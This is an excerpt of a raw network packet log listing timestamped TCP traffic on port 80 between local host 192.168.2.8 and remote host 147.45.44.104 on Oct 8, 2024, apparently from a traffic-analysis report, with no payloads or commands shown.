                                                                              Oct 8, 2024 03:23:05.293252945 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.293278933 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.293294907 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.293306112 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.293308020 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.293334961 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.293359995 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.293370008 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.293385029 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.293397903 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.294162035 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.294169903 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.294186115 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.294203043 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.294203997 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.294212103 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.294224977 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.294230938 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.294251919 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.294258118 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.294274092 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.294296026 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.295778036 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.295814037 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.295818090 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.295830965 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.295881987 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.295892000 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.295902967 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.295913935 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.295919895 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.295931101 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.295958042 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.297331095 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.297343969 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.297358990 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.297379017 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.297385931 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.297422886 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.297425985 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.297476053 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.297492027 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.297529936 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.298357964 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.298367977 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.298381090 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.298389912 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.298418999 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.298424006 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.298433065 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.298446894 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.298455954 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.298464060 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.298472881 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.298482895 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.299072027 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.300497055 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.300508022 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.300523043 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.300539970 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.300568104 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.300575972 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.300580025 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.300595045 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.300612926 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.300622940 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.300636053 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.300661087 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.301887989 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.301929951 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.301966906 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.301975012 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.301996946 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.302005053 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.302006960 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.302023888 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.302032948 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.302045107 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.302050114 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.302073002 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.302814007 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.302825928 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.302841902 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.302851915 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.302871943 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.302875996 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.302890062 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.302930117 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.302957058 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.302968025 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.302983999 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.303002119 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.305500984 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.305538893 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.305546045 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.305613041 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.305619955 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.305629969 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.305648088 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.305656910 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.305660963 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.305686951 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.305699110 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.305710077 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.350972891 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.350991011 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.351011992 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.351021051 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.351026058 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.351038933 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.351049900 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.351058006 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.351070881 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.351078987 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.351108074 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.374399900 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.374412060 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.374425888 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.374469995 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.374480009 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.374485016 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.374500036 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.374505997 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.374516964 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.374536037 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.374572039 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.378038883 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.378051043 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.378062963 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.378077984 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.378097057 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.378099918 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.378134966 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.378140926 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.378151894 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.378168106 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.378190041 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.378213882 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.378963947 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.378976107 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.378992081 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.379014969 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.379023075 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.379036903 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.379062891 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.379081964 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.379092932 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.379107952 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.379127979 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.379152060 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.379215002 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.379226923 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.379246950 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.379262924 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.379270077 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.379282951 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.379306078 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.379348993 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.379359961 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.379381895 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.379398108 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.379414082 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.380156994 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.380214930 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.380228043 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.380250931 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.380264044 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.380275011 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.380292892 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.380306005 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.380323887 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.380326033 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.380323887 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.380362988 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.381292105 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.381304979 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.381321907 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.381352901 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.381359100 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.381370068 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.381382942 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.381386995 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.381401062 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.381412029 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.381419897 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.381444931 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.382600069 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.382616043 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.382637978 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.382652998 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.382663012 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.382678986 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.382683992 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.382694960 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.382709026 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.382719040 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.382740974 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.382752895 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.383047104 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.383059978 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.383074999 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.383109093 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.383114100 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.383122921 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.383138895 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.383147001 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.383152962 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.383162975 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.383172035 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.383225918 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.383958101 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.383969069 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.383986950 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.383999109 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.384021044 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.384030104 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.384047985 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.384057999 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.384069920 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.384074926 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.384095907 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.384107113 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.385236025 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.385246992 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.385263920 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.385276079 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.385308981 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.385319948 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.385339975 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.385350943 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.385351896 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.385370016 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.385376930 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.385407925 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.386327028 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.386364937 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.386377096 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.386413097 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.386441946 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.386452913 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.386468887 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.386482954 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.386487007 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.386504889 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.388427019 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.388436079 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.388453007 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.388474941 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.388504028 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.388504028 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.388515949 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.388534069 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.388544083 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.388549089 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.388566971 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.388586998 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.390083075 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.390129089 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.390130043 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.390151024 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.390161037 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.390183926 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.390194893 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.390202045 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.390219927 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.390232086 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.390248060 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.390269041 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.392611980 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.392663002 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.392669916 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.392755032 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.392766953 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.392781973 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.392795086 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.392801046 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.392812967 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.392822981 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.392822981 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.392853975 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.398850918 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.398871899 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.398916006 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.398924112 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.398958921 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.398989916 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.399000883 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.399018049 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.399029016 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.399053097 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.399064064 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.399128914 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.437741041 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.437766075 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.437788010 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.437794924 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.437808037 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.437819958 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.437820911 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.437838078 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.437849045 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.437858105 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.437866926 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.437892914 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.487010956 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.647726059 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.647768021 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.647775888 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.647778988 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.647802114 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.647814989 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.647850990 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.647869110 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.647881031 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.647897959 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.647897959 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.647924900 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.648180008 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.648186922 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.648202896 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.648214102 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.648220062 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.648232937 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.648240089 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.648243904 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.648262978 CEST8049706147.45.44.104192.168.2.8
